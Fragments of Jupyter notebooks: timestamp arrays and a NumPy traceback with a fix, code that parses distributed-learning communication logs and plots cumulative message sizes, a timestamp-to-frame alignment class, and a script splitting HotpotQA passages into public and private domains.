1539344439.895, 1539344446.497, 1539344452.689, 1539344458.751, 1539344464.86, 1539344470.89, 1539344477.088, 1539344483.21, 1539344489.591, 1539344495.869, 1539344502.167, 1539344508.397, 1539344514.842, 1539344521.102, 1539344527.428, 1539344533.794, 1539344539.841, 1539344545.951, 1539344551.868, 1539344557.88, 1539344563.853, 1539344569.848, 1539344575.927, 1539344582.033, 1539344588.302, 1539344594.56, 1539344600.871, 1539344607.028, 1539344612.978, 1539344619.054, 1539344625.25, 1539344631.482, 1539344637.699, 1539344643.754, 1539344650.015, 1539344655.998, 1539344662.15, 1539344668.282, 1539344674.28, 1539344680.599, 1539344686.686, 1539344693.01, 1539344699.238, 1539344705.961, 1539344712.556, 1539344719.062, 1539344725.545], [1539343806.466, 1539343812.594, 1539343818.924, 1539343825.291, 1539343831.38, 1539343837.705, 1539343843.818, 1539343850.144, 1539343858.679, 1539343863.581, 1539343869.854, 1539343876.07, 1539343882.165, 1539343888.192, 1539343894.395, 1539343901.457, 1539343907.814, 1539343914.081, 1539343920.345, 1539343926.324, 1539343932.271, 1539343938.569, 1539343945.669, 1539343951.841, 1539343958.01, 1539343964.344, 1539343970.642, 1539343976.978, 1539343983.401, 1539343989.434, 1539343995.577, 1539344001.684, 1539344007.812, 1539344013.936, 1539344020.044, 1539344026.034, 1539344033.44, 1539344039.796, 1539344045.978, 1539344052.098, 1539344058.418, 1539344064.689, 1539344070.81, 1539344076.942, 1539344082.982, 1539344089.336, 1539344095.356, 1539344102.04, 1539344108.156, 1539344114.186, 1539344120.388, 1539344126.61, 1539344132.871, 1539344139.059, 1539344145.493, 1539344151.907, 1539344158.223, 1539344164.359, 1539344170.768, 1539344177.104, 1539344183.307, 1539344189.446, 1539344195.466, 1539344201.66, 1539344207.818, 1539344214.055, 1539344220.36, 1539344226.591, 1539344232.837, 1539344239.16, 1539344245.489, 1539344251.71, 1539344257.897, 1539344264.034, 1539344270.111, 1539344276.298, 1539344282.61, 1539344288.859, 1539344294.908, 
1539344301.504, 1539344307.765, 1539344313.868, 1539344320.187, 1539344326.411, 1539344332.577, 1539344338.578, 1539344344.8, 1539344351.035, 1539344357.209, 1539344363.415, 1539344369.758, 1539344375.884, 1539344382.049, 1539344388.216, 1539344394.291, 1539344400.498, 1539344406.857, 1539344413.102, 1539344419.242, 1539344425.292, 1539344431.318, 1539344437.555, 1539344443.787, 1539344449.965, 1539344456.037, 1539344462.192, 1539344468.415, 1539344474.553, 1539344480.872, 1539344486.973, 1539344493.307, 1539344499.56, 1539344505.798, 1539344512.034, 1539344518.203, 1539344524.314, 1539344530.377, 1539344536.567, 1539344542.774, 1539344549.003, 1539344555.249, 1539344561.492, 1539344567.593, 1539344573.742, 1539344580.02, 1539344586.047, 1539344592.341, 1539344598.466, 1539344604.658, 1539344610.763, 1539344616.883, 1539344622.999, 1539344629.085, 1539344635.245, 1539344641.447, 1539344647.471, 1539344653.756, 1539344659.806, 1539344666.051, 1539344672.142, 1539344678.282, 1539344684.308, 1539344690.537, 1539344696.797, 1539344703.116, 1539344709.736, 1539344716.096, 1539344722.665, 1539344729.096], [1539343806.652, 1539343812.925, 1539343819.572, 1539343825.816, 1539343832.508, 1539343838.715, 1539343844.966, 1539343851.247, 1539343858.548, 1539343864.379, 1539343870.749, 1539343877.165, 1539343883.429, 1539343889.468, 1539343896.74, 1539343902.85, 1539343908.945, 1539343915.216, 1539343921.473, 1539343927.597, 1539343933.736, 1539343941.012, 1539343946.794, 1539343952.691, 1539343958.936, 1539343965.406, 1539343971.728, 1539343977.927, 1539343984.098, 1539343990.571, 1539343996.999, 1539344003.293, 1539344009.598, 1539344028.389, 1539344029.436, 1539344030.462, 1539344036.056, 1539344042.289, 1539344048.457, 1539344054.568, 1539344060.934, 1539344067.16, 1539344073.367, 1539344079.658, 1539344086.162, 1539344092.574, 1539344098.7, 1539344104.707, 1539344110.926, 1539344117.048, 1539344123.166, 1539344129.501, 1539344135.77, 1539344142.034, 1539344148.356, 
1539344154.707, 1539344160.798, 1539344166.774, 1539344172.993, 1539344179.126, 1539344185.378, 1539344191.482, 1539344197.642, 1539344203.9, 1539344210.317, 1539344216.777, 1539344222.842, 1539344229.191, 1539344235.627, 1539344242.129, 1539344248.443, 1539344254.819, 1539344260.926, 1539344266.979, 1539344272.995, 1539344279.166, 1539344285.497, 1539344291.759, 1539344298.02, 1539344304.235, 1539344310.294, 1539344316.345, 1539344322.554, 1539344328.802, 1539344335.031, 1539344341.3, 1539344347.38, 1539344353.634, 1539344359.995, 1539344366.242, 1539344372.598, 1539344378.836, 1539344385.118, 1539344391.38, 1539344397.669, 1539344404.066, 1539344410.225, 1539344416.176, 1539344422.21, 1539344428.357, 1539344434.522, 1539344440.548, 1539344446.391, 1539344452.471, 1539344458.54, 1539344464.923, 1539344471.291, 1539344477.435, 1539344483.608, 1539344490.024, 1539344496.273, 1539344502.626, 1539344509.011, 1539344515.418, 1539344521.522, 1539344527.88, 1539344534.039, 1539344540.393, 1539344546.724, 1539344553.07, 1539344559.493, 1539344565.893, 1539344572.244, 1539344578.515, 1539344584.661, 1539344591.042, 1539344597.115, 1539344603.136, 1539344609.2, 1539344615.479, 1539344621.769, 1539344627.925, 1539344634.231, 1539344640.505, 1539344646.715, 1539344653.187, 1539344659.418, 1539344665.656, 1539344671.942, 1539344678.078, 1539344684.431, 1539344690.792, 1539344697.184, 1539344703.567, 1539344710.123, 1539344716.594, 1539344722.998, 1539344729.236]]
len(ts)
np.array([np.array(elem) for elem in ts]).flatten()
np.array([]).flatten()
np.array(ts).flatten()
np.amax(ts)
TypeError                                 Traceback (most recent call last)
<ipython-input-243-1167ee3da39d> in <module>()
     37     commonStep = currentStep
     38
---> 39     time_step = float(np.amax(timestamps))
     40
     41     # get data of registration and violation files up to this time step

TypeError: float() argument must be a string or a number, not 'list'
```
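The `TypeError` pasted above comes from `float(np.amax(timestamps))`: the per-worker lists grow at different rates, so `timestamps` is ragged, and NumPy cannot reduce a ragged nested list as a rectangular array (on older NumPy versions the reduction can even hand back a whole sub-list, which `float()` then rejects). A plain-Python reduction over hand-picked sample timestamps sidesteps the problem:

```python
# Hypothetical ragged per-worker timestamp lists (sizes differ on purpose).
timestamps = [
    [1539343806.652, 1539343812.847],
    [1539343802.776, 1539343808.776, 1539343814.743],  # one entry longer
]

# Reduce without NumPy: max over each worker's max; `if ts` skips workers
# that have not logged anything yet.
time_step = max(max(ts) for ts in timestamps if ts)
print(time_step)  # 1539343814.743
```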
# Somehow changed
```
files = []
losses = []
timestamps = []
for i in range(nodesAmount):
    files.append(open(os.path.join(experimentFolder, "worker" + str(i), "losses.txt"), "r"))
    losses.append([])
    timestamps.append([])
t = [0]
commonStep = 0
displayStep = 5
recordStep = 1
recordUnique = True
#print(f"message_sizes after registration {message_sizes}")
# buffer for violation messages (lines get read but might not be relevant for that sync round, so we have to remember them for the next time)
vlines_buffer = []
rlines_buffer = []
slines_buffer = []
message_size = 0
message_sizes = []
#figs = []
while 1:
    for i in range(nodesAmount):
        file = files[i]
        where = file.tell()
        line = file.readline()
        if not line:
            time.sleep(1)
            file.seek(where)
        else:
            losses[i].append(float(line[:-1].split('\t')[1]))  # could append sth else or take a counter
            timestamps[i].append(float(line.split('\t')[0]))
    currentStep = min([len(l) for l in losses])
    # now we need to know which worker is responsible for the minimum and take the time stamp of this worker
    worker_ind = np.argmin([len(l) for l in losses])
    sync_file = files[worker_ind]
    where = sync_file.tell()
    line = sync_file.readline()
    if not line:
        time.sleep(1)
        sync_file.seek(where)
    else:
        losses.append(float(line[:-1].split('\t')[1]))  # unnecessary here, but leave it for the moment to ensure the code below runs
        time_step = float(line.split('\t')[0])
        # get data of registration and violation files up to this time step
        #print("TIME STEP:" + str(time_step))
        #check for registrations up to time_step
        while True:  # unnecessary overhead, but just copied; could restrict it to the number of learners etc.
            # check in buffer (if not empty)
            if rlines_buffer != []:
                for rline in rlines_buffer:
                    if float(rline[0].split("\t")[0]) < time_step:
                        message_size = message_size + int(rline[0].split("\t")[4])
                        #print("registration message from buffer added with ts " + str(float(rline[0].split("\t")[0])))
                        #print("message_size: " + str(message_size))
                        # delete message from buffer
                        rlines_buffer.remove(rline)
            # read new lines
            where = data_registrations.tell()
            rline = data_registrations.readline()
            if not rline:  # could it be that I'm waiting here too long?
                #time.sleep(1)
                data_registrations.seek(where)
                break
            else:
                if float(rline.split("\t")[0]) < time_step:
                    # here: index 4 = message size
                    message_size = message_size + int(rline.split("\t")[4])
                    #print("registration message added with ts " + str(float(rline.split("\t")[0])))
                    #print("message_size: " + str(message_size))
                else:
                    rlines_buffer.append([rline])
                    break
        #check for sendModels up to time_step
        while True:
            # check in buffer (if not empty)
            if slines_buffer != []:
                for sline in slines_buffer:
                    if float(sline[0].split("\t")[0]) < time_step:
                        # count number of points in this string, which coincides with the number of nodes receiving the model
                        message_size = message_size + int(sline[0].split("\t")[3]) * sline[0].split("\t")[2].count(".")
                        #print("sendModel message from buffer added with ts " + str(float(sline[0].split("\t")[0])))
                        #print("message_size: " + str(message_size))
                        # delete message from buffer
                        slines_buffer.remove(sline)
            # read new lines
            where = data_sendModel.tell()
            sline = data_sendModel.readline()
            if not sline:  # could it be that I'm waiting here too long?
                #time.sleep(1)
                data_sendModel.seek(where)
                break
            else:
                if float(sline.split("\t")[0]) < time_step:
                    # here: index 3 = message size
                    # count number of points in this string, which coincides with the number of nodes receiving the model
                    message_size = message_size + int(sline.split("\t")[3]) * sline.split("\t")[2].count(".")
                    #print("sendModel message added with ts " + str(float(sline.split("\t")[0])))
                    #print("message_size: " + str(message_size))
                else:
                    slines_buffer.append([sline])
                    break
        #check for violations up to time_step
        while True:
            # check in buffer (if not empty)
            if vlines_buffer != []:
                for vline in vlines_buffer:
                    if float(vline[0].split("\t")[0]) < time_step:
                        message_size = message_size + int(vline[0].split("\t")[4])
                        #print("violation message from buffer added with ts " + str(float(vline[0].split("\t")[0])))
                        #print("message_size: " + str(message_size))
                        # delete message from buffer
                        vlines_buffer.remove(vline)
            # read new lines
            where = data_violations.tell()
            vline = data_violations.readline()
            if not vline:  # could it be that I'm waiting here too long?
                #time.sleep(1)
                data_violations.seek(where)
                break
            else:
                if float(vline.split("\t")[0]) < time_step:
                    # here: index 4 = message size
                    message_size = message_size + int(vline.split("\t")[4])
                    #print("violation message added with ts " + str(float(vline.split("\t")[0])))
                    #print("message_size: " + str(message_size))
                else:
                    vlines_buffer.append([vline])
                    break
        message_sizes.append(message_size)
        #print("message_sizes: " + str(message_sizes))
    #currentStep = min([len(l) for l in losses])
    #currentStep = len(losses)
    if currentStep > commonStep:
        commonStep = currentStep
        if commonStep % displayStep == 0:
            clear_output(wait=True)
            #cutLosses = [l[:commonStep] for l in losses]
            #figs = []
            #for i in range(nodesAmount):
                #figs.append(plt.figure())
            fig = plt.figure()
            #plt.plot(t, cutLosses[i], lw=2, label='loss learner ' + str(i), color='red')
            plt.plot(t, message_sizes, lw=2, label='cumulative communication', color='blue')
            plt.legend(loc='upper center')
            plt.grid()
            plt.show()
        t.append(t[-1] + 1)
        if len(t) % recordStep == 0 and t != 0:
            j = 0
            #for fig in figs:
            if recordUnique:
                #fig.savefig(os.path.join(experimentFolder, 'loss_learner' + str(j) + '_' + str(len(t)) + '.png'), dpi=100)
                fig.savefig(os.path.join(experimentFolder, 'cumulative_communication' + str(len(t)) + '.png'), dpi=100)
            else:
                #fig.savefig(os.path.join(experimentFolder, 'loss_learner' + str(j) + '.png'), dpi=100)
                fig.savefig(os.path.join(experimentFolder, 'cumulative_communication.png'), dpi=100)
            j += 1
```
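The three near-identical `while True:` loops above all implement one accounting rule: count a line's message size if its timestamp is at or before the current sync point, otherwise park it in a buffer for a later round. A simplified, in-memory sketch of that rule (the helper `count_up_to` and its sample lines are hypothetical; the real code reads one line at a time from a growing file):

```python
# Sketch of the buffered timestamp-cutoff accounting used in the loops above.
def count_up_to(lines, buffer, time_step, size_index=4):
    """Return bytes accumulated from buffered + new lines with ts <= time_step."""
    total = 0
    # drain the buffer first: it is ordered by timestamp, so stop at the first miss
    while buffer and float(buffer[0].split("\t")[0]) <= time_step:
        total += int(buffer.pop(0).split("\t")[size_index])
    for line in lines:
        if float(line.split("\t")[0]) <= time_step:
            total += int(line.split("\t")[size_index])
        else:
            buffer.append(line)   # too new: remember it for the next round
    return total

buffer = []
round1 = count_up_to(["1.0\ta\tb\tc\t100", "5.0\ta\tb\tc\t200"], buffer, 3.0)
round2 = count_up_to(["6.0\ta\tb\tc\t50"], buffer, 7.0)
print(round1, round2)  # 100 250
```

The second round counts the 200-byte line parked during the first round plus the new 50-byte line, which is exactly the carry-over behavior the `vlines_buffer`/`slines_buffer`/`rlines_buffer` lists provide.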
# OLD
```
# registration messages sizes
displayStep = 1
recordStep = 1
recordUnique = True
reg_msizes = []
line = data_registrations.readline()
while line != "":
# here: index 4 = message size
reg_msizes.append(int(line.split("\t")[4]))
line = data_registrations.readline()
# initial value of message_sizes = sum of registration message sizes
message_size = sum(reg_msizes)
message_sizes = []
message_sizes.append(message_size)
#print(f"message_sizes after registration {message_sizes}")
# buffer for violation messages (lines get read but might not be relevant for that sync round; so we have to remember them for the next time)
vlines_buffer = []
sync_round = 0
sync_rounds = []
sync_rounds.append(sync_round)
count = 0
while True:
#print(f"message_sizes beginning first loop {message_sizes}")
where = data_sendModel.tell()
line = data_sendModel.readline()
if not line:
time.sleep(1)
data_sendModel.seek(where)
else:
sync_round = sync_round + 1
sync_rounds.append(sync_round)
# index 0 = time stamp
sync_time = float(line.split("\t")[0])
# here: index 3 = message size, index 2 = topic which contains nodes that the model is sent to
# count number of points in this string which coincides with the number of nodes receiving the model
message_size = message_size + int(line.split("\t")[3]) * line.split("\t")[2].count(".")
#print(f"message_sizes after sync {message_sizes}")
# now check for violation messages up to sync time
while True:
# check in buffer (if not empty)
if vlines_buffer != []:
for vline in list(vlines_buffer): # iterate over a copy: items may be removed below
if float(vline[0].split("\t")[0]) < sync_time:
message_size = message_size + int(vline[0].split("\t")[4])
# delete message from buffer
vlines_buffer.remove(vline)
# read new lines
where = data_violations.tell()
vline = data_violations.readline()
if not vline:
time.sleep(1)
data_violations.seek(where)
else:
if float(vline.split("\t")[0]) < sync_time:
# if violation message was before synchronizing, add size of this message
# here: index 4 = message size
message_size = message_size + int(vline.split("\t")[4])
else:
vlines_buffer.append([vline])
break
message_sizes.append(message_size)
if sync_round % displayStep == 0:
clear_output(wait=True)
fig = plt.figure()
plt.plot(sync_rounds, message_sizes, label='cumulative communication', color='blue')
plt.legend(loc='upper left')
plt.grid()
plt.show()
if sync_round % recordStep == 0:
if recordUnique:
fig.savefig(os.path.join(experimentFolder, 'cumulative_communication' + str(sync_round) + '.png'), dpi=100)
else:
fig.savefig(os.path.join(experimentFolder, 'cumulative_communication.png'), dpi=100)
for file in files:
file.close()
#####CHANGED: / in front of files
def readExpParams(folder):
fileName = folder + "/summary.txt"
result = {}
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
if "Learner:" in line:
for val in line.replace("Learner:", "").split(","):
if "batchSize" in val:
result["batchSize"] = int(val.split("=")[1].strip())
return result
def readCoordRegistration(folder):
fileName = folder + "/coordinator/communication/registrations.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
origin = int(vals[3])
result.append([time, origin])
return result
def readWorkerRegistration(folder, worker):
fileName = folder + "/worker"+str(worker)+"/communication/registrations.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
origin = int(vals[3])
result.append([time, origin])
return result
def readCoordModel(folder):
fileName = folder + "/coordinator/communication/send_model.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
destinations = vals[2].replace("newModel.","").split(".")
for d in destinations:
result.append([time, int(d)])
return result
def readWorkerModel(folder, worker):
fileName = folder + "/worker"+str(worker)+"/communication/send_model.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
modelVersion = vals[2]
result.append([time, modelVersion])
return result
def readCoordViolations(folder):
fileName = folder + "/coordinator/communication/violations.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
origin = int(vals[3])
result.append([time, origin])
return result
def readWorkerViolations(folder, worker):
fileName = folder + "/worker"+str(worker)+"/communication/violations.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
result.append([time])
return result
def readWorkerLosses(folder, worker):
fileName = folder + "/worker"+str(worker)+"/losses.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
result.append([time])
return result
class TimeToFrame():
def __init__(self, batchSize, losses, registrations, framesPerExample): #for a proper maxTimestamp we would need the kill messages
self.batchSize = batchSize
self.lossTimestamps = sorted([l[0] for l in losses])
self.regTimestamps = sorted([r[0] for r in registrations])
self.framesPerExample = framesPerExample
self.minTimestamp = min([min(self.lossTimestamps),min(self.regTimestamps)])
self.maxTimestamp = max([max(self.lossTimestamps),max(self.regTimestamps)])
self.lastFrame = len(losses) * batchSize * framesPerExample
print("minTS: ", self.minTimestamp)
print("maxTS: ", self.maxTimestamp)
def convertTimestampsToFrames(self, messages):
newMessages = []
for m in messages:
ts = m[0]
new_m = m
new_m[0] = self._tsToFr(ts)
if not new_m[0] > self.lastFrame:#ignore messages after the last training was logged
newMessages.append(new_m)
return newMessages
def _tsToFr(self, ts):
framesPerBatch = self.batchSize*self.framesPerExample
frame = 0
#print ts
#print framesPerBatch,"\n***"
for i in range(len(self.lossTimestamps)):
l = self.lossTimestamps[i]
#print "l: ",l
#print "frame: ",frame
if ts > l:
frame += framesPerBatch
elif ts <= l and i > 0:
high = l
low = self.lossTimestamps[i-1]
pos = int((float(ts - low) /float(high - low))*framesPerBatch)
#print "i: ",i," high: ",high," low: ",low, "ts: ", ts
#print "pos: ",pos, "frame: ",frame
frame += pos
return frame
else:
high = l
low = self.minTimestamp
pos = int((float(ts - low) /float(high - low))*framesPerBatch)
#print "end:"
#print "i: ",i," high: ",high," low: ",low, "ts: ", ts
#print "pos: ",pos, "frame: ",frame
frame += pos
return frame
#print "len losses",len(self.lossTimestamps)
#print "ts: ",ts," frame: ", frame," i: ",i
return self.lastFrame + 1
expParams = readExpParams(experimentFolder)
batchSize = expParams["batchSize"]
framesPerExample = 5
coordRegistration = readCoordRegistration(experimentFolder)
worker0Registration = readWorkerRegistration(experimentFolder, 0)
coordModel = readCoordModel(experimentFolder)
worker0Model = readWorkerModel(experimentFolder, 0) #these are just the "receives"
coordViolations = readCoordViolations(experimentFolder)
worker0Violations = readWorkerViolations(experimentFolder, 0)
worker0Losses = readWorkerLosses(experimentFolder, 0)
#In the following, I'm going to align the coordinator time with that of worker0
#workerViolations = [worker0Violations,worker1Violations,worker2Violations,worker3Violations]
#workerModels = [worker0Model,worker1Model,worker2Model,worker3Model]
#workerRegistrations = [worker0Registration,worker1Registration,worker2Registration,worker3Registration]
#workerLosses = [woker0Losses,woker1Losses,woker2Losses,woker3Losses]
Tcoord = TimeToFrame(batchSize, worker0Losses, worker0Registration, framesPerExample)
print("aligning violations")
cviol = Tcoord.convertTimestampsToFrames(coordViolations)
violations = [] #containing send_frame, sender, receive_frame, receiver, type
#for i in range(len(workerViolations)):
# print("worker ",i)
T = TimeToFrame(batchSize, worker0Losses, worker0Registration, framesPerExample)
wviol = T.convertTimestampsToFrames(worker0Violations)
cviolW = [c for c in cviol if c[1] == 0] #only the violations received from worker i
if len(wviol) != len(cviolW):
print("WTF!?! len model messages = ", len(wviol), " len coord messages = ", len(cviolW))
coordPos = 0
for j in range(len(wviol)):
send_frame = wviol[j][0]
sender = "worker" + str(0)
receive_frame = cviolW[coordPos]
if len(receive_frame)>1:
receive_frame = receive_frame[0]
while (receive_frame < send_frame):
coordPos += 1
receive_frame = cviolW[coordPos]
if len(receive_frame)>1:
receive_frame = receive_frame[0]
violations.append([send_frame, sender, receive_frame, "coordinator", "violation"])
#print violations
print("aligning send_model messages:")
print("lastFrame: ", Tcoord.lastFrame)
cmodel = Tcoord.convertTimestampsToFrames(coordModel)
sendModels = [] #containing send_frame, sender, receive_frame, receiver, type
for i in range(len(workerModels)):
print("worker ", i)
T = TimeToFrame(batchSize, workerLosses[i], workerRegistrations[i], framesPerExample)
wmodel = T.convertTimestampsToFrames(workerModels[i])
cmodelW = [c for c in cmodel if c[1] == i] #only the models send to worker i
if len(wmodel) != len(cmodelW):
print("WTF!?! len model messages = ", len(wmodel), " len coord messages = ", len(cmodelW))
workerPos = 0
for j in range(len(cmodelW)):
if not workerPos < len(wmodel):
break
send_frame = cmodelW[j][0]
sender = "coordinator"
receive_frame = wmodel[workerPos][0]
receiver = "worker" + str(i)
while (receive_frame < send_frame):
workerPos += 1
if workerPos >= len(wmodel):
receive_frame = Tcoord.lastFrame
#print("WTF... receive frame: ", receive_frame)
break
receive_frame = wmodel[workerPos][0]
#print([send_frame, sender, receive_frame, receiver, "sendModel"], " workerPos: ", workerPos)
sendModels.append([send_frame, sender, receive_frame, receiver, "sendModel"])
```
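`TimeToFrame._tsToFr` above maps a log timestamp to a frame index: every loss interval the timestamp has fully passed contributes `batchSize * framesPerExample` frames, and inside the interval containing the timestamp it interpolates linearly between the interval's endpoints. The same mapping can be written more compactly with `bisect` (a sketch under the same assumptions, not a drop-in replacement for the class):

```python
import bisect

def timestamp_to_frame(ts, loss_timestamps, min_ts, frames_per_batch):
    """Convert timestamp ts to a frame index.

    Each completed loss interval counts for frames_per_batch frames;
    within the current interval we interpolate linearly. Timestamps
    after the last logged loss map past the last frame, mirroring the
    'ignore messages after the last training was logged' check above.
    """
    loss_timestamps = sorted(loss_timestamps)
    i = bisect.bisect_left(loss_timestamps, ts)  # intervals fully passed
    if i == len(loss_timestamps):                # after the last loss entry
        return len(loss_timestamps) * frames_per_batch + 1
    low = loss_timestamps[i - 1] if i > 0 else min_ts
    high = loss_timestamps[i]
    frac = float(ts - low) / float(high - low)
    return i * frames_per_batch + int(frac * frames_per_batch)
```

For example, a timestamp halfway through the second interval of `[10.0, 20.0, 30.0]` (with 100 frames per batch) lands at frame 150.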
```
%load_ext autoreload
%autoreload 2
import csv
import ujson, os
import json
from tqdm import tqdm
import os.path
import pandas as pd
import time
from collections import Counter, defaultdict, OrderedDict
import random
import ast
prefix = "concurrentqa/" # FILL IN PATH TO REPOSITORY
```
# Load original data
```
st = time.time()
passages_path = f'{prefix}/datasets/hotpotqa/hotpot_index/wiki_id2doc.json'
with open(passages_path) as f:
wiki_id2doc = json.load(f)
passages = []
for k, v in wiki_id2doc.items():
v['id'] = k
passages.append(v)
print(f"Loaded full set of documents in {time.time() - st}")
st = time.time()
df = pd.DataFrame(passages)
print(f"Built DataFrame of documents in {time.time() - st}")
st = time.time()
df.head(1)
alldomaintitles = []
title2sent_map = {}
count = 0
for k, v in tqdm(wiki_id2doc.items()):
title = v['title']
sents = v['text']
sents = sents.split(". ")
alldomaintitles.append(title)
title2sent_map[title] = sents
print(len(title2sent_map))
with open(f'{prefix}/datasets/hotpotqa/hotpot/hotpot_qas_val.json') as f:
qa_entries = []
for line in f:
entry = ast.literal_eval(line)
qa_entries.append(entry)
print(f"QAs set has {len(qa_entries)} data points.")
```
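The cell above parses each line of the validation file with `ast.literal_eval` rather than `json.loads`; that tolerates Python-literal spellings (single quotes, `True`/`None`) that strict JSON rejects. A small hedged sketch of a line parser that accepts both forms (the helper name is mine):

```python
import ast
import json

def parse_record(line):
    """Parse one line of a JSONL-style file: try strict JSON first,
    then fall back to Python literal syntax (single quotes, True/None)."""
    line = line.strip()
    try:
        return json.loads(line)
    except json.JSONDecodeError:
        return ast.literal_eval(line)
```

Both `'{"q": "who?"}'` and `"{'q': 'who?'}"` then parse to the same dict.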
### The following generates new private/public data splits and prepares everything for running retrieval on HotpotQA Dev Data
```
def process_item(item, domain=-1):
item['domain'] = domain
return item
def get_domain_splits(private_prop, alldomaintitles):
title2domain = {}
domain1titles = []
domain2titles = []
random.seed(0)
# splits by title randomly
for title in tqdm(alldomaintitles):
randnum = random.random()
if randnum > private_prop:
title2domain[title] = 0
domain1titles.append(title)
else:
title2domain[title] = 1
domain2titles.append(title)
return title2domain, domain1titles, domain2titles
# we will do this for private splits of different sizes; private_prop 0.5 means equal 50-50 public-private splits
for private_prop in [0.5]:
# path where you will save the generated data
path = f"{prefix}/datasets/hotpotqa_pair/hotpot_privateprop_{private_prop}/"
if not os.path.exists(path):
os.makedirs(path)
title2domain, domain1titles, domain2titles = get_domain_splits(private_prop, alldomaintitles)
# Save the passages
print(f"Num domain 1 titles: {len(domain1titles)}")
print(f"Num domain 2 titles: {len(domain2titles)}\n")
if not os.path.exists(path):
print(f"Making dir at: {path}")
os.makedirs(path)
df['domain1'] = df['title'].apply(lambda x: title2domain[x]==0)
df['domain2'] = df['title'].apply(lambda x: title2domain[x]==1)
sub_df = df[df['domain1'] == True]
dic = sub_df.to_dict('index')
with open(f'{path}/domain0psgs.json', "w") as f:
json.dump(dic, f)
print("Saved domain 1 passages.")
sub_df = df[df['domain2'] == True]
dic = sub_df.to_dict('index')
with open(f'{path}/domain1psgs.json', "w") as f:
json.dump(dic, f)
print("Saved domain 2 passages.")
# determine private and public entities of those appearing in the queries
entity_df = pd.DataFrame(entitytitles.items(), columns=['entitytitle', 'domain'])
entity_df['domain'] = entity_df['entitytitle'].apply(lambda x: title2domain[x]==0)
entitytitle2domain_cache = {}
for ind, row in entity_df.iterrows():
entitytitle2domain_cache[row['entitytitle']] = row['domain']
# Save the questions
localquestions = []
globalquestions = []
not_in_corpus = 0
for idx, item in tqdm(enumerate(qa_entries)):
sps = item['sp']
domains = [entitytitle2domain_cache[sp['title']] for sp in sps]
domain1_exists = any(d == True for d in domains)
domain2_exists = any(d == False for d in domains)
neither_exists = not domain1_exists and not domain2_exists
if domain1_exists and not domain2_exists:
localquestions.append(process_item(item, domain=domains))
if not domain1_exists and domain2_exists:
globalquestions.append(process_item(item, domain=domains))
if neither_exists:
not_in_corpus += 1
print(f"There are: {len(localquestions)} local questions")
print(f"There are: {len(globalquestions)} global questions")
print(f"For {not_in_corpus} questions, could not find documents in corpus.")
if not os.path.exists(f'{path}/domain_0/'):
os.makedirs(f'{path}/domain_0/')
if not os.path.exists(f'{path}/domain_1/'):
os.makedirs(f'{path}/domain_1/')
with open(f'{path}/domain_0/hotpot_qas_val_domain0.json', 'w') as f:
for question in localquestions:
json.dump(question, f)
f.write("\n")
with open(f'{path}/domain_1/hotpot_qas_val_domain1.json', 'w') as f:
for question in globalquestions:
json.dump(question, f)
f.write("\n")
allquestions = localquestions.copy()
allquestions.extend(globalquestions.copy())
with open(f'{path}/hotpot_qas_val_all.json', 'w') as f:
for question in allquestions:
json.dump(question, f)
f.write("\n")
print(f"Saved data for private proportion {private_prop}.")
```
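`get_domain_splits` above assigns each title independently to the private domain with probability `private_prop`, seeded so the split is reproducible; over many titles the realized private fraction concentrates near `private_prop`. A self-contained sketch of the same idea, using a local `random.Random` instance instead of reseeding the global RNG (a design choice of mine, not the notebook's):

```python
import random

def split_titles(titles, private_prop, seed=0):
    """Assign each title independently: private (domain 1) with
    probability private_prop, otherwise public (domain 0)."""
    rng = random.Random(seed)  # local RNG: does not disturb global random state
    title2domain = {}
    public, private = [], []
    for title in titles:
        if rng.random() > private_prop:
            title2domain[title] = 0
            public.append(title)
        else:
            title2domain[title] = 1
            private.append(title)
    return title2domain, public, private
```

With the seed fixed, repeated calls reproduce the identical split, which is what lets the notebook regenerate the same corpora across runs.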